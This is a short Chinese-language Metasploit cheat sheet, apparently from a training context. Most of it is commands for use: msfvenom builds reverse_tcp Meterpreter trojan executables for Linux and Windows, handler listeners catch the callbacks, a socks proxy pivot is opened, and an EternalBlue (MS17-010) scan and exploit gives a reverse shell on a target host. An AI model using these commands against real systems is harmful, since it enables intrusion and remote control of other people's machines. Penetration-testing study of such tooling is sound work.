常用命令 show exploits – 查看所有可用的渗透攻击程序代码 show auxiliary – 查看所有可用的辅助攻击工具 show options – 查看该模块所有可用选项 show payloads – 查看该模块适用的所有载荷代码 show targets – 查看该模块适用的攻击目标类型 search – 根据关键字搜索某模块 info – 显示某模块的详细信息 use – 进入使用某渗透攻击模块 back – 回退 set/unset – 设置/禁用模块中的某个参数 setg/unsetg – 设置/禁用适用于所有模块的全局参数 save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用 Cd 更改当前的工作目录
生成可执行文件
1 2 3 4 5 6
Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
监听
1 2 3 4 5 6 7 8 9 10 11 12
set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false 让connection保持连接(即使一个连接退出,仍然保持listening状态) exploit -j –z -j(作为job开始运行)和-z(不立即进行session交换--也即是自动后台运行)
也可以在启动的时候监听 msfconsole -x use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 127.0.0.1; set lport 1234; exploit -j
//生成生成木马32位 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.133 lport=8898 -f exe >/root/jiaoxue/dianxin/garck.exe //开启监听 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.88.133 set lport 8898 run
//生成生成木马64位 msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.133 lport=8897 -f exe >/root/jiaoxue/dianxin/garck641.exe //生成生成木马64位 msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.88.133 lport=8897 -f exe >/root/jiaoxue/dianxin/garck64.exe //开启监听 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.88.133 set lport 8897 run
创建代理通道: use auxiliary/server/socks_proxy show options run
shell //进入cmd的shell
chcp 65001 //显示utf8编码的中文字符
永恒之蓝
扫描是否存在永恒之蓝
1 2 3
use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.88.10 run
攻击阶段
1 2 3 4 5 6
use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.88.10 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.88.133 set lport 4455 run